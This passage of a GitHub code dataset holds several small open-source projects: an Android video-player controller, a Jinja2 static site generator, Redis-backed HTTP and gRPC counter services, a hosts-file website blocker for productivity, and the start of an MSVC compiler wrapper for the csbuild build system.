.into(mImage);\n }\n\n public void setImage(@DrawableRes int resId) {\n mImage.setImageResource(resId);\n }\n\n public void setKyVideoPlayer(KyVideoPlayerControl kyVideoPlayer) {\n mKyVideoPlayer = kyVideoPlayer;\n if (mKyVideoPlayer.isIdle()) {\n mBack.setVisibility(View.GONE);\n ll_mTop.setVisibility(View.VISIBLE);\n ll_mBottom.setVisibility(View.GONE);\n }\n }\n\n @Override\n public void onClick(View v) {\n if (v == mCenterStart) {\n if (mKyVideoPlayer.isIdle()) {\n mKyVideoPlayer.start();\n }\n } else if (v == mBack) {\n if (mKyVideoPlayer.isFullScreen()) {\n mKyVideoPlayer.exitFullScreen();\n } else if (mKyVideoPlayer.isTinyWindow()) {\n mKyVideoPlayer.exitTinyWindow();\n }\n } else if (v == mRestartPause) {\n if (mKyVideoPlayer.isPlaying() || mKyVideoPlayer.isBufferingPlaying()) {\n mKyVideoPlayer.pause();\n } else if (mKyVideoPlayer.isPaused() || 
mKyVideoPlayer.isBufferingPaused()) {\n mKyVideoPlayer.restart();\n }\n } else if (v == mFullScreen) {\n if (mKyVideoPlayer.isNormal()) {\n mKyVideoPlayer.enterFullScreen();\n } else if (mKyVideoPlayer.isFullScreen()) {\n mKyVideoPlayer.exitFullScreen();\n }\n } else if (v == mRetry) {\n mKyVideoPlayer.release();\n mKyVideoPlayer.start();\n } else if (v == mReplay) {\n mRetry.performClick();\n } else if (v == mShare) {\n Toast.makeText(mContext, \"分享\", Toast.LENGTH_SHORT).show();\n } else if (v == this) {\n if (mKyVideoPlayer.isPlaying()\n || mKyVideoPlayer.isPaused()\n || mKyVideoPlayer.isBufferingPlaying()\n || mKyVideoPlayer.isBufferingPaused()) {\n setTopBottomVisible(!topBottomVisible);\n }\n }\n }\n\n private void setTopBottomVisible(boolean visible) {\n ll_mTop.setVisibility(visible ? View.VISIBLE : View.GONE);\n ll_mBottom.setVisibility(visible ? View.VISIBLE : View.GONE);\n topBottomVisible = visible;\n if (visible) {\n if (!mKyVideoPlayer.isPaused() && !mKyVideoPlayer.isBufferingPaused()) {\n startDismissTopBottomTimer();\n }\n } else {\n cancelDismissTopBottomTimer();\n }\n }\n\n private void startDismissTopBottomTimer() {\n cancelDismissTopBottomTimer();\n if (mDismissTopBottomCountDownTimer == null) {\n mDismissTopBottomCountDownTimer = new CountDownTimer(8000, 8000) {\n @Override\n public void onTick(long millisUntilFinished) {\n\n }\n\n @Override\n public void onFinish() {\n setTopBottomVisible(false);\n }\n };\n }\n mDismissTopBottomCountDownTimer.start();\n }\n\n private void cancelDismissTopBottomTimer() {\n if (mDismissTopBottomCountDownTimer != null) {\n mDismissTopBottomCountDownTimer.cancel();\n }\n }\n\n public void setControllerState(int playerState, int playState) {\n switch (playerState) {\n case KyVideoPlayer.PLAYER_NORMAL:\n mBack.setVisibility(View.GONE);\n mFullScreen.setVisibility(View.VISIBLE);\n mFullScreen.setImageResource(R.drawable.ic_player_enlarge);\n break;\n case KyVideoPlayer.PLAYER_FULL_SCREEN:\n mBack.setVisibility(View.VISIBLE);\n mFullScreen.setVisibility(View.VISIBLE);\n mFullScreen.setImageResource(R.drawable.ic_player_shrink);\n break;\n case KyVideoPlayer.PLAYER_TINY_WINDOW:\n mFullScreen.setVisibility(View.GONE);\n break;\n }\n switch (playState) {\n case KyVideoPlayer.STATE_IDLE:\n break;\n case KyVideoPlayer.STATE_PREPARING:\n //只显示动画,其他不显示\n mImage.setVisibility(View.GONE);\n ll_mLoading.setVisibility(View.VISIBLE);\n mLoadText.setText(\"正在准备...\");\n ll_mError.setVisibility(View.GONE);\n ll_mCompleted.setVisibility(View.GONE);\n ll_mTop.setVisibility(View.GONE);\n mCenterStart.setVisibility(View.GONE);\n break;\n case KyVideoPlayer.STATE_PREPARED:\n startUpdateProgressTimer();\n break;\n case KyVideoPlayer.STATE_PLAYING:\n ll_mLoading.setVisibility(View.GONE);\n mRestartPause.setImageResource(R.drawable.ic_player_pause);\n startDismissTopBottomTimer();\n break;\n case KyVideoPlayer.STATE_PAUSED:\n ll_mLoading.setVisibility(View.GONE);\n mRestartPause.setImageResource(R.drawable.ic_player_start);\n cancelDismissTopBottomTimer();\n break;\n case KyVideoPlayer.STATE_BUFFERING_PLAYING:\n ll_mLoading.setVisibility(View.VISIBLE);\n mRestartPause.setImageResource(R.drawable.ic_player_pause);\n mLoadText.setText(\"正在缓冲...\");\n startDismissTopBottomTimer();\n break;\n case KyVideoPlayer.STATE_BUFFERING_PAUSED:\n ll_mLoading.setVisibility(View.VISIBLE);\n mRestartPause.setImageResource(R.drawable.ic_player_start);\n mLoadText.setText(\"正在缓冲...\");\n cancelDismissTopBottomTimer();\n break;\n case KyVideoPlayer.STATE_COMPLETED:\n 
cancelUpdateProgressTimer();\n setTopBottomVisible(false);\n mImage.setVisibility(View.VISIBLE);\n ll_mCompleted.setVisibility(View.VISIBLE);\n if (mKyVideoPlayer.isFullScreen()) {\n mKyVideoPlayer.exitFullScreen();\n }\n if (mKyVideoPlayer.isTinyWindow()) {\n mKyVideoPlayer.exitTinyWindow();\n }\n break;\n case KyVideoPlayer.STATE_ERROR:\n cancelUpdateProgressTimer();\n setTopBottomVisible(false);\n ll_mTop.setVisibility(View.VISIBLE);\n ll_mError.setVisibility(View.VISIBLE);\n break;\n }\n }\n\n private void startUpdateProgressTimer() {\n cancelUpdateProgressTimer();\n if (mUpdateProgressTimer == null) {\n mUpdateProgressTimer = new Timer();\n }\n if (mUpdateProgressTimerTask == null) {\n mUpdateProgressTimerTask = new TimerTask() {\n @Override\n public void run() {\n KyVideoPlayerController.this.post(new Runnable() {\n @Override\n public void run() {\n updateProgress();\n }\n });\n }\n };\n }\n mUpdateProgressTimer.schedule(mUpdateProgressTimerTask, 0, 300);\n }\n\n private void updateProgress() {\n int position = mKyVideoPlayer.getCurrentPosition();\n int duration = mKyVideoPlayer.getDuration();\n int bufferPercentage = mKyVideoPlayer.getBufferPercentage();\n mSeek.setSecondaryProgress(bufferPercentage);\n int progress = (int) (100f * position / duration);\n mSeek.setProgress(progress);\n mPosition.setText(VideoUtil.formatTime(position));\n mDuration.setText(VideoUtil.formatTime(duration));\n }\n\n private void cancelUpdateProgressTimer() {\n if (mUpdateProgressTimer != null) {\n mUpdateProgressTimer.cancel();\n mUpdateProgressTimer = null;\n }\n if (mUpdateProgressTimerTask != null) {\n mUpdateProgressTimerTask.cancel();\n mUpdateProgressTimerTask = null;\n }\n }\n\n @Override\n public void onProgressChanged(SeekBar seekBar, int progress, boolean fromUser) {\n\n }\n\n @Override\n public void onStartTrackingTouch(SeekBar seekBar) {\n cancelDismissTopBottomTimer();\n }\n\n @Override\n public void onStopTrackingTouch(SeekBar seekBar) {\n if (mKyVideoPlayer.isBufferingPaused() || mKyVideoPlayer.isPaused()) {\n mKyVideoPlayer.restart();\n }\n int position = (int)(mKyVideoPlayer.getDuration() * seekBar.getProgress() / 100f);\n mKyVideoPlayer.seekTo(position);\n startDismissTopBottomTimer();\n }\n\n /**\n * 控制器恢复到初始状态\n */\n public void reset() {\n topBottomVisible = false;\n cancelUpdateProgressTimer();\n cancelDismissTopBottomTimer();\n mSeek.setProgress(0);\n mSeek.setSecondaryProgress(0);\n\n mCenterStart.setVisibility(View.VISIBLE);\n mImage.setVisibility(View.VISIBLE);\n\n ll_mBottom.setVisibility(View.GONE);\n mFullScreen.setImageResource(R.drawable.ic_player_enlarge);\n\n ll_mTop.setVisibility(View.VISIBLE);\n mBack.setVisibility(View.GONE);\n\n ll_mLoading.setVisibility(View.GONE);\n ll_mError.setVisibility(View.GONE);\n ll_mCompleted.setVisibility(View.GONE);\n }\n}\n" } ]
11
fahadahammed/ThawPY
https://github.com/fahadahammed/ThawPY
5f89a216f996c98356d476f149b6bc3ff95b67a9
4669267472d6e2f68cf5cda53043266a326efb67
3b8200b8dd0dcb7885ef11cfeadd28029bbbd4ee
refs/heads/master
2020-09-05T20:31:10.323778
2019-11-07T11:50:16
2019-11-07T11:50:16
220,206,356
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6280487775802612, "alphanum_fraction": 0.6353658437728882, "avg_line_length": 29.370370864868164, "blob_id": "4a0cbe6666de0aa123bff7dcc73dbe1b26c95437", "content_id": "9ce39a280262005f20b14fa058f3b6525411c263", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 820, "license_type": "permissive", "max_line_length": 104, "num_lines": 27, "path": "/setup.py", "repo_name": "fahadahammed/ThawPY", "src_encoding": "UTF-8", "text": "import setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name='ThawPY',\n version='1.0',\n url='https://github.com/fahadahammed/ThawPY',\n license='MIT License ',\n author='Fahad Ahammed',\n author_email='[email protected]',\n description=\"\"\"ThawPY is for you if you want to make markdown to html files with predefined design. \n It is just like a static site generator.\"\"\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n packages=setuptools.find_packages(),\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\"\n ],\n install_requires=[\n 'pytz', 'markdown', 'jinja2'\n ],\n python_requires='>=3.6'\n)\n" }, { "alpha_fraction": 0.6172839403152466, "alphanum_fraction": 0.636214017868042, "avg_line_length": 26.636363983154297, "blob_id": "29a192b8f885c1d37a697896bc4503914069e356", "content_id": "5883945b813f7ce6f9c36a3db32ded5536fa1404", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1215, "license_type": "permissive", "max_line_length": 129, "num_lines": 44, "path": "/thaw.py", "repo_name": "fahadahammed/ThawPY", "src_encoding": "UTF-8", "text": "# Project ThawPY is developed by Fahad Ahammed on 11/7/19, 4:40 PM.\n#\n# Last modified at 11/7/19, 4:33 PM.\n#\n# Github: fahadahammed\n# Email: [email protected]\n#\n# Copyright (c) 2019. 
All rights reserved.\n\nimport datetime\nimport pytz\nimport os\nimport sys\nimport json\nimport jinja2\n\n\nclass Thaw:\n    def __init__(self, site_source=None):\n        self.time_zone = \"Asia/Dhaka\"\n        # Honor a caller-supplied source directory, falling back to the default template path\n        # (the parameter was previously accepted but ignored).\n        self.site_source = site_source if site_source else \"./thaw/templates\"\n\n    def list_of_files(self):\n        to_return = []\n        for root, dirs, files in os.walk(self.site_source):\n            for filename in files:\n                to_return.append(filename)\n        return to_return\n\n    def generate_html(self):\n        title = \"Thaw Site Generator!\"\n        user_name = \"Fahad Ahammed\"\n        templateLoader = jinja2.FileSystemLoader(searchpath=self.site_source)\n        templateEnv = jinja2.Environment(loader=templateLoader)\n        TEMPLATE_FILE = \"page.html\"\n        template = templateEnv.get_template(TEMPLATE_FILE)\n        outputText = template.render(site_title=title, user_name=user_name)  # this is where to put args to the template renderer\n\n        return outputText\n\n\nif __name__ == \"__main__\":\n    # print(Thaw().list_of_files())\n    print(Thaw().generate_html())" }, { "alpha_fraction": 0.7910447716712952, "alphanum_fraction": 0.7910447716712952, "avg_line_length": 66.5, "blob_id": "f3f3789bad0cce3372b932d3cfb539ed7ec58e3c", "content_id": "a5d59c8a074d697a02843303ffc9619f03c880bd", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 134, "license_type": "permissive", "max_line_length": 125, "num_lines": 2, "path": "/README.md", "repo_name": "fahadahammed/ThawPY", "src_encoding": "UTF-8", "text": "# ThawPY\nThawPY is for you if you want to make markdown to html files with predefined design. It is just like a static site generator." } ]
3
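The ThawPY sources in the row above wire up Jinja2 but never call into the markdown package that setup.py installs, so the markdown-to-HTML step the README describes is still missing from thaw.py. A minimal sketch of that step, assuming a hypothetical index.md input and a content placeholder in page.html (neither exists in the repository as archived):

import markdown
import jinja2

def render_page(md_path, template_dir="./thaw/templates", template_name="page.html"):
    # Convert the markdown source into an HTML fragment.
    with open(md_path, "r") as md_file:
        body_html = markdown.markdown(md_file.read())
    # Wrap the fragment in the site template, mirroring generate_html() in thaw.py.
    env = jinja2.Environment(loader=jinja2.FileSystemLoader(searchpath=template_dir))
    template = env.get_template(template_name)
    # site_title and user_name match the variables thaw.py already renders;
    # content is the assumed placeholder that receives the converted markdown.
    return template.render(site_title="Thaw Site Generator!",
                           user_name="Fahad Ahammed",
                           content=body_html)

if __name__ == "__main__":
    print(render_page("index.md"))  # index.md is a hypothetical input file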
VitoVan/demo-service-counter
https://github.com/VitoVan/demo-service-counter
6f4824734b1eaff0b39970946323a2120a4ca017
54875f1130a3c79d8ff9634d3fd96428660fd8cb
b637e9a6ff74cdd0873048ed83c4fca5edabe5df
refs/heads/master
2020-11-26T09:07:22.069524
2020-02-26T11:17:02
2020-02-28T10:06:23
229,024,916
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5056521892547607, "alphanum_fraction": 0.5173913240432739, "avg_line_length": 31.394365310668945, "blob_id": "28b31ecbd423886fccddc040e68a299dccc25c37", "content_id": "72047d925aa370eb154e9d2d857899f5c291f8dd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2300, "license_type": "no_license", "max_line_length": 69, "num_lines": 71, "path": "/http_server.py", "repo_name": "VitoVan/demo-service-counter", "src_encoding": "UTF-8", "text": "from http.server import BaseHTTPRequestHandler, HTTPServer\nimport redis\nimport os\nimport grpc\n\nimport counter_pb2\nimport counter_pb2_grpc\n\n\nclass Server(BaseHTTPRequestHandler):\n\n def __init__(self, *args, **kwargs):\n self.name = 'counter'\n if os.environ['HTTP_BACKEND'] == 'GRPC':\n self.backend = 'grpc'\n else:\n self.backend = 'redis'\n\n if self.backend == 'redis':\n self.r = redis.Redis(host='localhost', port=6379,\n db=0, decode_responses=True)\n elif self.backend == 'grpc':\n self.g = counter_pb2_grpc.CounterStub(\n grpc.insecure_channel('localhost:50051'))\n super().__init__(*args, **kwargs)\n\n def get(self):\n if self.backend == 'redis':\n return self.r.get('counter')\n else:\n header_metadata = tuple([(k.lower(), v)\n for k, v in self.headers.items()\n if k.startswith('x-')])\n response, call = self.g.get.with_call(\n counter_pb2.CounterRequest(name='counter'),\n metadata=header_metadata)\n return response.count\n\n def incr(self):\n if self.backend == 'redis':\n return self.r.incr('counter')\n else:\n header_metadata = tuple([(k.lower(), v)\n for k, v in self.headers.items()\n if k.startswith('x-')])\n response, call = self.g.incr.with_call(\n counter_pb2.CounterRequest(name='counter'),\n metadata=header_metadata)\n return response.count\n\n def do_GET(self):\n print(self.headers)\n count = self.get()\n self.resp(f'{{ \"count\": \"{count}\" }}')\n\n def do_PUT(self):\n print(self.headers)\n count = self.incr()\n self.resp(f'{{ \"count\": \"{count}\" }}')\n\n def resp(self, msg):\n self.send_response(200)\n self.send_header('Content-type', 'application/json')\n self.end_headers()\n self.wfile.write(bytes(msg, 'UTF-8'))\n\n\nif __name__ == '__main__':\n server = HTTPServer(('0.0.0.0', 80), Server)\n print('Starting server @ 80, use <Ctrl-C> to stop')\n server.serve_forever()\n" }, { "alpha_fraction": 0.606249988079071, "alphanum_fraction": 0.606249988079071, "avg_line_length": 28.090909957885742, "blob_id": "1ef202d4449d3f0d22f38e39b9b2643a504385a7", "content_id": "19252af32cdbee01cf70ff5da5b7f2f16d4421f9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 320, "license_type": "no_license", "max_line_length": 48, "num_lines": 11, "path": "/start.sh", "repo_name": "VitoVan/demo-service-counter", "src_encoding": "UTF-8", "text": "if [[ \"$SERVER_TYPE\" == \"GRPC\" ]]; then\n python grpc_server.py\nelif [[ \"$SERVER_TYPE\" == \"HTTP\" ]]; then\n if [[ \"$HTTP_BACKEND\" == \"GRPC\" ]]; then\n HTTP_BACKEND=GRPC python http_server.py\n else\n HTTP_BACKEND=REDIS python http_server.py\n fi\nelse\n HTTP_BACKEND=REDIS python http_server.py\nfi\n" }, { "alpha_fraction": 0.6849315166473389, "alphanum_fraction": 0.6900050640106201, "avg_line_length": 30.285715103149414, "blob_id": "4192e9f97debb3a739ba8d19574c5d00e74adeec", "content_id": "cfa21e8a0c71f752a4dbd0151f5f0a8d3d2b0222", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1971, "license_type": 
"no_license", "max_line_length": 74, "num_lines": 63, "path": "/counter_pb2_grpc.py", "repo_name": "VitoVan/demo-service-counter", "src_encoding": "UTF-8", "text": "# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!\nimport grpc\n\nimport counter_pb2 as counter__pb2\n\n\nclass CounterStub(object):\n \"\"\"The Counter service definition.\n \"\"\"\n\n def __init__(self, channel):\n \"\"\"Constructor.\n\n Args:\n channel: A grpc.Channel.\n \"\"\"\n self.incr = channel.unary_unary(\n '/demo.counter.Counter/incr',\n request_serializer=counter__pb2.CounterRequest.SerializeToString,\n response_deserializer=counter__pb2.CounterReply.FromString,\n )\n self.get = channel.unary_unary(\n '/demo.counter.Counter/get',\n request_serializer=counter__pb2.CounterRequest.SerializeToString,\n response_deserializer=counter__pb2.CounterReply.FromString,\n )\n\n\nclass CounterServicer(object):\n \"\"\"The Counter service definition.\n \"\"\"\n\n def incr(self, request, context):\n \"\"\"Add count\n \"\"\"\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def get(self, request, context):\n \"\"\"Get count\n \"\"\"\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n\ndef add_CounterServicer_to_server(servicer, server):\n rpc_method_handlers = {\n 'incr': grpc.unary_unary_rpc_method_handler(\n servicer.incr,\n request_deserializer=counter__pb2.CounterRequest.FromString,\n response_serializer=counter__pb2.CounterReply.SerializeToString,\n ),\n 'get': grpc.unary_unary_rpc_method_handler(\n servicer.get,\n request_deserializer=counter__pb2.CounterRequest.FromString,\n response_serializer=counter__pb2.CounterReply.SerializeToString,\n ),\n }\n generic_handler = grpc.method_handlers_generic_handler(\n 'demo.counter.Counter', rpc_method_handlers)\n server.add_generic_rpc_handlers((generic_handler,))\n" }, { "alpha_fraction": 0.7121211886405945, "alphanum_fraction": 0.7196969985961914, "avg_line_length": 32, "blob_id": "609723e5ba9b22b5f08622af8e8abe3c836ec314", "content_id": "74e0f0119a94a85a9651ee7d3ae71ced66ca1ead", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Dockerfile", "length_bytes": 132, "license_type": "no_license", "max_line_length": 74, "num_lines": 4, "path": "/Dockerfile", "repo_name": "VitoVan/demo-service-counter", "src_encoding": "UTF-8", "text": "FROM python:3\nRUN pip install redis grpcio protobuf -i https://pypi.doubanio.com/simple/\nCOPY ./ ./\nENTRYPOINT [\"bash\", \"start.sh\"]\n" }, { "alpha_fraction": 0.6579925417900085, "alphanum_fraction": 0.6793680191040039, "avg_line_length": 29.742856979370117, "blob_id": "19bdb533c9ad79686b0613f1ffdeb828a86d5907", "content_id": "8e932a1bd9cec1f0ffe9377189c75b4a73460b13", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1076, "license_type": "no_license", "max_line_length": 78, "num_lines": 35, "path": "/grpc_server.py", "repo_name": "VitoVan/demo-service-counter", "src_encoding": "UTF-8", "text": "from concurrent import futures\nimport grpc\n\nimport counter_pb2\nimport counter_pb2_grpc\n\nimport redis\n\nr = redis.Redis(host='localhost', port=6379, db=0, decode_responses=True)\n\n\nclass Counter(counter_pb2_grpc.CounterServicer):\n\n def incr(self, request, context):\n for key, value in context.invocation_metadata():\n print('Received 
initial metadata: key=%s value=%s' % (key, value))\n return counter_pb2.CounterReply(count=str(r.incr(request.name)))\n\n def get(self, request, context):\n for key, value in context.invocation_metadata():\n print('Received initial metadata: key=%s value=%s' % (key, value))\n return counter_pb2.CounterReply(count=str(r.get(request.name)))\n\n\ndef serve():\n server = grpc.server(futures.ThreadPoolExecutor(max_workers=10))\n counter_pb2_grpc.add_CounterServicer_to_server(Counter(), server)\n server.add_insecure_port('[::]:50051')\n server.start()\n server.wait_for_termination()\n\n\nif __name__ == '__main__':\n print('Starting gRPC Server @ 50051, use <Ctrl-C> to stop')\n serve()\n" } ]
5
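The generated stub in the row above exposes unary incr and get methods on the demo.counter.Counter service, and both servers print whatever metadata arrives with a call. A client-side sketch against the insecure port grpc_server.py binds; the x-request-id key is invented for illustration, while everything else comes from the generated counter_pb2 modules shown above:

import grpc

import counter_pb2
import counter_pb2_grpc

def main():
    # Target matches grpc_server.py's add_insecure_port('[::]:50051').
    with grpc.insecure_channel("localhost:50051") as channel:
        stub = counter_pb2_grpc.CounterStub(channel)

        # Custom metadata keys must be lowercase; both servers log each pair.
        metadata = (("x-request-id", "example-123"),)

        # with_call() returns the reply plus the call object, the same pattern
        # http_server.py uses when it forwards its x- headers over gRPC.
        reply, call = stub.incr.with_call(
            counter_pb2.CounterRequest(name="counter"), metadata=metadata)
        print("count after incr:", reply.count, "status:", call.code())

        reply = stub.get(counter_pb2.CounterRequest(name="counter"), metadata=metadata)
        print("current count:", reply.count)

if __name__ == "__main__":
    main()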
SubhadipNag/block-website
https://github.com/SubhadipNag/block-website
f9925be4228a578cf08eb111cf4ad1a071734fd1
3583eb4d5eea71ab8d5e315071b96deb32bd6ce4
47ac7e97d9b057dcba0d049293bc45a4e0185ae3
refs/heads/master
2022-04-18T05:24:04.951632
2020-03-27T13:34:12
2020-03-27T13:34:12
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.8068965673446655, "alphanum_fraction": 0.8068965673446655, "avg_line_length": 47.33333206176758, "blob_id": "f598daa28dbcbe4daf708e9a76cbd02aa8d945d5", "content_id": "0189f3ebc458dcdcf001b4a62d18c77cca855712", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 591, "license_type": "no_license", "max_line_length": 186, "num_lines": 12, "path": "/README.md", "repo_name": "SubhadipNag/block-website", "src_encoding": "UTF-8", "text": "# block-website\nWebsite blocker written in Python\n\nThe goal of this script is to block websites so you can be even more productive, such as while studying, working, and keeping your focus and concentration\n\nYou can use it for other purposes as well.\n\nNote that it modifies the operating system's \"hosts\" file, so between Windows and Linux only the directory path changes\n\nI recommend running it with administrative privileges and, if you prefer, you can make a script so that it runs and blocks the sites automatically after every reboot\n\n**Created by Joas Antonio**\n" }, { "alpha_fraction": 0.48875802755355835, "alphanum_fraction": 0.4957173466682434, "avg_line_length": 41, "blob_id": "7b47c191f427e944800d114235fc44434a408efe", "content_id": "d3c8b15429166bffb54c3e5bda646580da1b331a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1873, "license_type": "no_license", "max_line_length": 177, "num_lines": 43, "path": "/block.py", "repo_name": "SubhadipNag/block-website", "src_encoding": "UTF-8", "text": "# Run this script from the root\r\n \r\nimport time \r\nfrom datetime import datetime as dt \r\n \r\n# Select the hosts file path for your machine\r\n#hosts_path = \"C:\\Windows\\System32\\drivers\\etc\\hosts\"\r\n#hosts_path = \"/etc/hosts\"\r\nhosts_path = str(input(\"Digite o caminho do diretório: \"))\r\n# Local IP\r\nredirect = \"127.0.0.1\"\r\n \r\n# Sites that will be blocked\r\nwebsite_list = [\"www.facebook.com\",\"facebook.com\", \"www.youtube.com\", \"web.whatsapp.com\", \"www.twitter.com\", \"www.instagram.com\", \"youtube.com\", \"twitter.com\", \"instagram.com\"] \r\ntry: \r\n    while True: \r\n        # Blocking window \r\n        if dt(dt.now().year, dt.now().month, dt.now().day,8)< dt.now() < dt(dt.now().year, dt.now().month, dt.now().day,16): \r\n            print(\"Bloqueando...\") \r\n            with open(hosts_path, 'r+') as file: \r\n                content = file.read() \r\n                for website in website_list: \r\n                    if website in content: \r\n                        pass\r\n                    else: \r\n                        # Map hostnames to the local address \r\n                        file.write(redirect + \" \" + website + \"\\n\") \r\n        else:\r\n            with open(hosts_path, 'r+') as file: \r\n                content=file.readlines() \r\n                file.seek(0) \r\n                for line in content: \r\n                    if not any(website in line for website in website_list): \r\n                        file.write(line)\r\n                # Drop leftover bytes from the longer, blocked version of the file\r\n                file.truncate()\r\n        # Avoid rewriting the hosts file in a tight loop\r\n        time.sleep(60)\r\nexcept KeyboardInterrupt: \r\n    with open(hosts_path, 'r+') as file: \r\n        content=file.readlines() \r\n        file.seek(0) \r\n        for line in content: \r\n            if not any(website in line for website in website_list): \r\n                file.write(line)\r\n        file.truncate()\r\n    print(\"Finish\") \r\n    \r\n" } ]
2
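block.py in the row above toggles hosts-file entries on a schedule: inside the blocking window it appends one redirect line per site, outside it rewrites the file without those lines, and truncating after the rewrite is what keeps leftover bytes from the longer, blocked version out of the file. A condensed sketch of that pair of operations, with the hosts path left as a parameter since it differs per OS and requires administrative rights to write:

REDIRECT = "127.0.0.1"
WEBSITES = ["www.facebook.com", "facebook.com"]

def block(hosts_path):
    # Append one redirect line per site that is not already present.
    with open(hosts_path, "r+") as hosts:
        content = hosts.read()
        for site in WEBSITES:
            if site not in content:
                hosts.write("{} {}\n".format(REDIRECT, site))

def unblock(hosts_path):
    # Rewrite the file keeping only lines that mention none of the sites,
    # then truncate to drop any remainder of the longer blocked version.
    with open(hosts_path, "r+") as hosts:
        lines = hosts.readlines()
        hosts.seek(0)
        for line in lines:
            if not any(site in line for site in WEBSITES):
                hosts.write(line)
        hosts.truncate()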
SleepingCatGames/csbuild2
https://github.com/SleepingCatGames/csbuild2
5f265aec1a490e32503857bff5d1e139992a1652
c7389961bee3d8e5088c8c3c8c4bb7e273e4ec50
878e65a34f6b10ac81759ab87147022360bfd622
refs/heads/develop
2023-08-31T07:17:55.905512
2023-08-20T21:45:05
2023-08-20T21:45:05
100,565,406
1
1
null
2017-08-17T05:36:13
2022-02-20T18:51:52
2023-08-20T21:45:05
Python
[ { "alpha_fraction": 0.6683894395828247, "alphanum_fraction": 0.6712237596511841, "avg_line_length": 34.916168212890625, "blob_id": "569da80ee114db9d42d4e5b69e6fafbbce473064", "content_id": "6fbe03f8a65f30196f8b434a11592a791c91d665", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5998, "license_type": "no_license", "max_line_length": 131, "num_lines": 167, "path": "/csbuild/tools/cpp_compilers/msvc_cpp_compiler.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: msvc_cpp_compiler\n\t:synopsis: msvc compiler tool for C++\n\n.. moduleauthor:: Zoe Bare\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport os\n\nfrom .cpp_compiler_base import CppCompilerBase\nfrom ..common.msvc_tool_base import MsvcToolBase\nfrom ..common.tool_traits import HasDebugLevel, HasOptimizationLevel\nfrom ... 
import log\nfrom ..._utils import response_file, shared_globals\n\nDebugLevel = HasDebugLevel.DebugLevel\nOptimizationLevel = HasOptimizationLevel.OptimizationLevel\n\ndef _ignore(_):\n\tpass\n\nclass MsvcCppCompiler(MsvcToolBase, CppCompilerBase):\n\t\"\"\"\n\tMSVC compiler tool implementation.\n\t\"\"\"\n\tsupportedPlatforms = { \"Windows\" }\n\tsupportedArchitectures = { \"x86\", \"x64\", \"arm64\" }\n\toutputFiles = { \".obj\" }\n\n\tdef __init__(self, projectSettings):\n\t\tMsvcToolBase.__init__(self, projectSettings)\n\t\tCppCompilerBase.__init__(self, projectSettings)\n\n\t\tself._exePath = None\n\n\t####################################################################################################################\n\t### Methods implemented from base classes\n\t####################################################################################################################\n\n\tdef _getEnv(self, project):\n\t\treturn self.vcvarsall.env\n\n\tdef _getOutputFiles(self, project, inputFile):\n\t\toutputPath = os.path.join(project.GetIntermediateDirectory(inputFile), os.path.splitext(os.path.basename(inputFile.filename))[0])\n\t\toutputFiles = [\"{}.obj\".format(outputPath)]\n\n\t\tif self._debugLevel in [DebugLevel.ExternalSymbols, DebugLevel.ExternalSymbolsPlus]:\n\t\t\toutputFiles.append(\"{}.pdb\".format(outputPath))\n\t\t\tif self._debugLevel == DebugLevel.ExternalSymbolsPlus:\n\t\t\t\toutputFiles.append(\"{}.idb\".format(outputPath))\n\n\t\treturn tuple(outputFiles)\n\n\tdef _getCommand(self, project, inputFile, isCpp):\n\t\tcmd = self._getDefaultArgs() \\\n\t\t\t+ self._getCustomArgs(project, isCpp) \\\n\t\t\t+ self._getPreprocessorArgs() \\\n\t\t\t+ self._getDebugArgs() \\\n\t\t\t+ self._getOptimizationArgs() \\\n\t\t\t+ self._getRuntimeLinkageArgs() \\\n\t\t\t+ self._getLanguageStandardArgs() \\\n\t\t\t+ self._getIncludeDirectoryArgs() \\\n\t\t\t+ 